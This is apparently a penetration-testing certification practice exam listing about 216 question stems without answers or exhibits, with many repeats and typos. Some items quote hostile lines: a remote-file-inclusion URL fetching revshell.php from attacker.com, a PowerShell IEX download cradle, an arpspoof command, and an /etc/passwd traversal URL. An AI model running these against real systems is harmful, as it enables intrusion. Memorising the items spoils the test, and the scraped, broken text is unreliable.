EMT Practice Test

1. Question Content...


Question List

Question1: A security consultant finds a folder in "C VProgram Files" that has writable permission from an unprivileged user account Which of the following can be used to gam higher privileges?

Question2: A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?

Question3: A client needs to be PCI compliant and has external-facing web servers.
Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

Question4: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question5: A penetration tester is checking a script to determine why some basic persisting. The expected result was the program outputting "True."
\

Given the output from the console above, which of the following explains how to correct the errors in the script? (Select TWO)

Question6: An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?

Question7: Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Question8: Black box penetration testing strategy provides the tester with:

Question9: Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Question10: A penetration tester is performing a wireless penetration test.
Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Question11: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question12: A penetration tester, who is not on the client's network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?

Question13: A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Question14: A penetration tester successfully exploits a system, receiving a reverse shell.
Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

Question15: D18912E1457D5D1DDCBD40AB3BF70D5D
Which of the following is the MOST comprehensive type of penetration test on a network?

Question16: At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Question17: A recent vulnerability scan of all web servers in an environment offers the following results:

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

Question18: A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

Question19: Which of the following types of physical security attacks does a mantrap mitigate-?

Question20: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A)

B)

C)

D)

Question21: Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question22: A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Question23: Consider the following PowerShell command:
Powershell.exe
IEX (New-Object Net.Webclient).downloadstring (http:// site/script.ps1"); Invoke-Cmdlet Which of the following BEST describes the actions performed this command?

Question24: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
A)

B)

C)

D)

Question25: A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?

Question26: A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?

Question27: A penetration tester ran an Nmap scan against a target and received the following output:

Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses or vulnerabilities?

Question28: While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Question29: While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Question30: Black box penetration testing strategy provides the tester with:

Question31: The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?

Question32: Which of the following tools is used to perform a credential brute force attack?

Question33: Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Question34: A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

Question35: During a penetration test a tester Identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

Question36: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

Question37: A penetration tester executes the following commands:

Which of the following is a local host vulnerability that the attacker is exploiting?

Question38: A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

Question39: Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

Question40: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

Question41: During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?

Question42: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question43: Given the following HTTP response:
http/1.0 200 OK
Server: Apache
Set-Cookie: AUTHID=879DHUT74D9A7C; http-only
Content-type: text/html
Connection: Close
Which of the following aspects of an XSS attack would be prevented?

Question44: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question45: A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

Question46: A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

Question47: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question48: When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Question49: A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline . Which of the following should the penetration tester perform to verify compliance with the baseline?

Question50: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Question51: A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

Question52: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Question53: A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

Question54: A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Question55: During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?

Question56: After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

Question57: A penetration tester reviews the scan results of a web application.
Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question58: Which of the following is the purpose of an NDA?

Question59: Click the exhibit button.

Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Select TWO)

Question60: In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

Question61: A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application.
Before beginning to test the application, which of the following should the assessor request from the organization?

Question62: A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

Question63: During the exploitation phase of a web application, a penetration tester finds XML files are being used to handle parameters that are sent for the server. Which of the following vulnerabilities can be exploited to try to access internal files of the affected web server using a web proxy?

Question64: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Question65: Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

Question66: A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the "false positive" token to the "Confirmed" column for each vulnerability that is a false positive.

Question67: Which of the following is the BEST initial attack against an identified FTP server on the remote network?

Question68: Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?

Question69: A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Question70: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question71: Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question72: Given the following script:

Which of the following BEST describes the purpose of this script?

Question73: Which of the following commands starts the Metasploit database?

Question74: During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

Question75: A tester identifies an XSS attack vector during a penetration test. Which of the following flags should the tester recommend to prevent a JavaScript payload from accessing the cookie?

Question76: A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

Question77: A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

Question78: Given the following Python script:

Which of the following actions will it perform?

Question79: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question80: A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability < The tester runs the following command nmap -D 192.168.1.1,192.168.1.2,192.168.1.3 -sV -o -max rate 2 192. 168.130 Which ol the following BEST describes why multiple IP addresses are specified?

Question81: When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Question82: A software development team recently migrated to new application software on the on-premises environment.
Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM. Which of the following is MOST important for confirmation?

Question83: During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

Which of the following Medusa commands would potentially provide better results?

Question84: A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:


Which of the following should be performed to escalate the privileges?

Question85: You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question86: A penetration tester ran the following Nmap scan on a computer
nmap -sV 192.168.1.5
The organization said it had disabled Telnet from its environment However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH Which of the following is the BEST explanation for what happened?

Question87: While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?

Question88: A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

Question89: A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box. Which of the following techniques is suitable to attempt this?

Question90: An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

Question91: A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

Question92: A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?

Question93: A penetration tester has gained a root shell on a target Linux server and wants to have the server "check in" over HTTP using a GET request to the penetration tester's laptop once every hour, even after system reboots. The penetration tester wrote a bash script to perform this. Which of the following represents the BEST method to persist the script?

Question94: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question95: A penetration tester must assess a web service. Which of the following should the tester request during the scoping phase?

Question96: Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question97: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question98: Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

Question99: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question100: During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context:
www-data. After reviewing, the following output from /etc/sudoers:

Which of the following users should be targeted for privilege escalation?

Question101: Which of the following BEST protects against a rainbow table attack?
D18912E1457D5D1DDCBD40AB3BF70D5D

Question102: A penetration tester compromises a system that has unrestricted network access over port 443 to any host.
The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

Question103: A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

Question104: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

Question105: A penetration tester is performing a code review. Which of the following testing techniques is being performed?

Question106: Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question107: A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.
Which of the following controls would BEST mitigate the vulnerability?

Question108: Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Question109: Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?

Question110: Which of the following are MOST important when planning for an engagement? (Select TWO).

Question111: Black box penetration testing strategy provides the tester with:

Question112: You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part1: Given the output, construct the command that was used to generate this output from the available options.
Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Part1

Part2

Question113: A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

Question114: A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate?
(Select TWO)

Question115: Which of the following BEST protects against a rainbow table attack?

Question116: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Question117: A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

Question118: A client is asking a penetration tester to evaluate a new web application for availability.
Which of the following types of attacks should the tester use?

Question119: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question120: A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?

Question121: A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

Question122: An assessor begins an internal security test of the Windows domain internal. comptia. net.
The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
A)

B)

C)

D)

Question123: An assessor begins an internal security test of the Windows domain internal.compti a.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

Question124: Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

Question125: A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?

Question126: A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.
Which of the following levels of difficulty would be required to exploit this vulnerability?

Question127: A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

Question128: A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device types is the tester MOST likely testing?

Question129: A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Question130: A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access. Which of the following controls would BEST mitigate the vulnerability?

Question131: The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?

Question132: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question133: A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant recommend be implemented?

Question134: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question135: An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?

Question136: A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

Question137: During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of the following processes would BEST protect this information from being disclosed in the future?

Question138: A penetration tester has access to a local machine running Linux, but the account has limited privileges. Which of the following types of files could the tester BEST use for privilege escalation?

Question139: A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

Question140: A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would define the target list?

Question141: : 88
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Question142: A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

Question143: A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

Question144: An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable. Which of the following is a relevant approach to test this?

Question145: Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Question146: A penetration tester is asked to scope an external engagement. Which of the following would be a valid target?

Question147: A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

Question148: A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session. Which of the following will accomplish this successfully?

Question149: Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

Question150: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question151: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question152: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

Question153: When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?

Question154: Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question155: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question156: At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website. Which of the following approached should the penetration tester take?

Question157: Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

Question158: A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.
Which of the following levels of difficulty would be required to exploit this vulnerability?

Question159: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

Question160: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
arpspoof -c both -r -t 192.168.1.1 192.168.1.20

Question161: A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Question162: A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:
http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

Question163: A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

Question164: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question165: A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application.
Which of the following would be the BEST remediation strategy?

Question166: A vulnerability scan is run against a domain hosing a banking application that accepts connections over MTTPS and HTTP protocols Given the following results:
* SSU3 supported
* HSTS not enforced
* Application uses weak ciphers
* Vulnerable to clickjacking
Which of the following should be ranked with the HIGHEST risk?

Question167: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

Question168: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question169: Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Question170: A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of previous compromise Which of the following would be the most logical steps to follow NEXT?

Question171: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question172: A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

Question173: An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Question174: Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

Question175: A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place the code?

Question176: A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in Question: within the last 30 minutes. Which of the following has MOST likely occurred?

Question177: A penetration tester attempts to perform a UDP port scan against a remote target using an Nmap tool installed onto a non-Kali Linux image. For some reason, the UDP scan falls to start. Which of the following would MOST likely help to resolve the issue?

Question178: A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester's IP address be whitelisted?

Question179: A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the "false positive" token to the "Confirmed" column for each vulnerability that is a false positive.

Question180: A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Question181: After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

Question182: A penetration tester executes the following commands:

Which of the following is a local host vulnerability that the attacker is exploiting?

Question183: A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

Question184: Given the following script:

Which of the following BEST describes the purpose of this script?

Question185: In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

Question186: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Question187: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Question188: A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Question189: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

Question190: Click the exhibit button.

Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Select TWO)

Question191: A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

Question192: D18912E1457D5D1DDCBD40AB3BF70D5D
During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context: www-dat a. After reviewing, the following output from /etc/sudoers:

Which of the following users should be targeted for privilege escalation?

Question193: Which of the following exploits a vulnerability associated with IoT devices?

Question194: A penetration tester has identified a directory traversal vulnerability.
Which of the following payloads could have helped the penetration tester identify this vulnerability?

Question195: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question196: A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Question197: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network Which of the following types of attacks should the tester stop?

Question198: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.
Which of the following is the MOST efficient to utilize?

Question199: Which of the following tools is used to perform a credential brute force attack?

Question200: A penetration tester executes the following commands:

Which of the following is a local host vulnerability that the attacker is exploiting?

Question201: A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Question202: Which of the following BEST describes the difference between a red team engagement and a penetration test?

Question203: A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

Question204: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question205: Which of the following attacks is commonly combined with cross-site scripting for session hijacking?

Question206: A penetration tester executes the following commands:

Which of the following is a local host vulnerability that the attacker is exploiting?

Question207: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.

Question208: Consider the following PowerShell command:
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?

Question209: A penetration tester ran an Nmap scan against a target and received the following output:

Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses or vulnerabilities?

Question210: An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

Question211: A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability < The tester runs the following command nmap -D 192.168.1.1,192.168.1.2,192.168.1.3 -sV -o -max rate 2 192. 168.130 Which ol the following BEST describes why multiple IP addresses are specified?

Question212: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Question213: If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?

Question214: A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting "True".

Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose two.)

Question215: A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting "True".

Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose two.)

Question216: A web server is running PHP, and a penetration tester is using LFI to execute commands by passing parameters through the URL. This is possible because server logs were poisoned to execute the PHP system ( ) function. Which of the following would retrieve the contents of the passwd file?

